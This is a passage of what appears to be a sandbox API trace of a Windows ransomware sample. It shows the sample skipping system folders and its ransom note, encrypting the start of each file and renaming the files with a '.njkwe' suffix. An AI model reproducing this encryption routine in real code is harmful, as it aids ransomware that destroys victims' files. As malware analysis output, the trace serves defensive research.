HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.112] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0064.112] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="Windows") returned -1 [0064.112] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="$Recycle.bin") returned 1 [0064.112] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="System Volume Information") returned -1 [0064.112] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="Program Files") returned 1 [0064.112] lstrcmpiW (lpString1="SetupEngine.dll", lpString2="Program Files (x86)") returned 1 [0064.112] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll") returned 41 [0064.112] StrStrIW (lpFirst="SetupEngine.dll", lpSrch=".njkwe") returned 0x0 [0064.112] lstrcmpW (lpString1="SetupEngine.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.112] lstrcmpW (lpString1="SetupEngine.dll", lpString2="taridd") returned -1 [0064.112] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.112] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.112] GetTickCount () returned 0x1150701 [0064.112] GetTickCount () returned 0x1150701 [0064.112] GetTickCount () returned 0x1150701 [0064.112] GetTickCount () returned 0x1150701 [0064.112] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.112] GetProcessHeap () returned 0xbe0000 [0064.112] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.112] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.114] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.115] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.115] GetProcessHeap () returned 0xbe0000 [0064.115] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.115] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.115] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.116] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.116] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.116] CloseHandle (hObject=0x428) returned 1 [0064.137] GetProcessHeap () returned 0xbe0000 [0064.137] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.137] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll_r00t_{3sXlE5}.njkwe") returned 61 [0064.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupEngine.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll_r00t_{3sxle5}.njkwe")) returned 1 [0064.138] GetProcessHeap () returned 0xbe0000 [0064.138] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.138] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0064.138] lstrcmpiW (lpString1="SetupUi.dll", lpString2="Windows") returned -1 [0064.138] lstrcmpiW (lpString1="SetupUi.dll", lpString2="$Recycle.bin") returned 1 [0064.138] lstrcmpiW (lpString1="SetupUi.dll", lpString2="System Volume Information") returned -1 [0064.138] lstrcmpiW (lpString1="SetupUi.dll", lpString2="Program Files") returned 1 [0064.138] lstrcmpiW (lpString1="SetupUi.dll", lpString2="Program Files (x86)") returned 1 [0064.138] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll") returned 37 [0064.138] StrStrIW (lpFirst="SetupUi.dll", lpSrch=".njkwe") returned 0x0 [0064.138] lstrcmpW (lpString1="SetupUi.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.138] lstrcmpW (lpString1="SetupUi.dll", lpString2="taridd") returned -1 [0064.138] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.138] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.138] GetTickCount () returned 0x1150730 [0064.138] GetTickCount () returned 0x1150730 [0064.139] GetTickCount () returned 0x1150730 [0064.139] GetTickCount () returned 0x1150730 [0064.139] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.139] GetProcessHeap () returned 0xbe0000 [0064.139] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.139] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.141] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.141] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.141] GetProcessHeap () returned 0xbe0000 [0064.141] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.141] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.141] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.143] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.143] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.143] CloseHandle (hObject=0x428) returned 1 [0064.149] GetProcessHeap () returned 0xbe0000 [0064.149] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.149] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll_r00t_{3sXlE5}.njkwe") returned 57 [0064.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\setupui.dll_r00t_{3sxle5}.njkwe")) returned 1 [0064.149] GetProcessHeap () returned 0xbe0000 [0064.149] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.149] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0064.149] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="Windows") returned -1 [0064.149] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="$Recycle.bin") returned 1 [0064.150] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="System Volume Information") returned -1 [0064.150] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="Program Files") returned 1 [0064.150] lstrcmpiW (lpString1="SetupUi.xsd", lpString2="Program Files (x86)") returned 1 [0064.150] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd") returned 37 [0064.150] StrStrIW (lpFirst="SetupUi.xsd", lpSrch=".njkwe") returned 0x0 [0064.150] lstrcmpW (lpString1="SetupUi.xsd", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.150] lstrcmpW (lpString1="SetupUi.xsd", lpString2="taridd") returned -1 [0064.150] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.150] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.150] GetTickCount () returned 0x1150730 [0064.150] GetTickCount () returned 0x1150730 [0064.150] GetTickCount () returned 0x1150730 [0064.150] GetTickCount () returned 0x1150730 [0064.150] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.150] GetProcessHeap () returned 0xbe0000 [0064.150] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.150] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.162] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.162] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.162] GetProcessHeap () returned 0xbe0000 [0064.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.162] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.162] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.162] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.162] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.162] CloseHandle (hObject=0x428) returned 1 [0064.164] GetProcessHeap () returned 0xbe0000 [0064.164] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.164] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd_r00t_{3sXlE5}.njkwe") returned 57 [0064.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd_r00t_{3sxle5}.njkwe")) returned 1 [0064.164] GetProcessHeap () returned 0xbe0000 [0064.164] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.164] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0064.164] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="Windows") returned -1 [0064.164] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="$Recycle.bin") returned 1 [0064.165] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="System Volume Information") returned -1 [0064.165] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="Program Files") returned 1 [0064.165] lstrcmpiW (lpString1="SetupUtility.exe", lpString2="Program Files (x86)") returned 1 [0064.165] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe") returned 42 [0064.165] StrStrIW (lpFirst="SetupUtility.exe", lpSrch=".njkwe") returned 0x0 [0064.165] lstrcmpW (lpString1="SetupUtility.exe", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.165] lstrcmpW (lpString1="SetupUtility.exe", lpString2="taridd") returned -1 [0064.165] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.165] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.165] GetTickCount () returned 0x1150740 [0064.165] GetTickCount () returned 0x1150740 [0064.165] GetTickCount () returned 0x1150740 [0064.165] GetTickCount () returned 0x1150740 [0064.165] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.165] GetProcessHeap () returned 0xbe0000 [0064.165] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.165] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.167] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.167] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.168] GetProcessHeap () returned 0xbe0000 [0064.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.168] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.168] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.168] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.168] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.168] CloseHandle (hObject=0x428) returned 1 [0064.170] GetProcessHeap () returned 0xbe0000 [0064.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.170] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe_r00t_{3sXlE5}.njkwe") returned 62 [0064.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUtility.exe_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe_r00t_{3sxle5}.njkwe")) returned 1 [0064.171] GetProcessHeap () returned 0xbe0000 [0064.171] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0064.171] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0064.171] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="Windows") returned -1 [0064.171] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="$Recycle.bin") returned 1 [0064.171] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="System Volume Information") returned -1 [0064.171] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="Program Files") returned 1 [0064.171] lstrcmpiW (lpString1="SplashScreen.bmp", lpString2="Program Files (x86)") returned 1 [0064.171] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 42 [0064.171] StrStrIW (lpFirst="SplashScreen.bmp", lpSrch=".njkwe") returned 0x0 [0064.171] lstrcmpW (lpString1="SplashScreen.bmp", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0064.171] lstrcmpW (lpString1="SplashScreen.bmp", lpString2="taridd") returned -1 [0064.171] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0064.171] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0064.171] GetTickCount () returned 0x1150740 [0064.171] GetTickCount () returned 0x1150740 [0064.171] GetTickCount () returned 0x1150740 [0064.171] GetTickCount () returned 0x1150740 [0064.171] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0064.172] GetProcessHeap () returned 0xbe0000 [0064.172] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0064.172] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.176] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.176] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0064.176] GetProcessHeap () returned 0xbe0000 [0064.176] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0064.176] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.176] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0064.176] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0064.176] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0064.176] CloseHandle (hObject=0x428) returned 1 [0064.178] GetProcessHeap () returned 0xbe0000 [0064.178] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0064.178] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp_r00t_{3sXlE5}.njkwe") returned 62 [0064.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp_r00t_{3sxle5}.njkwe")) returned 1 [0064.178] GetProcessHeap () returned 0xbe0000 [0064.178] 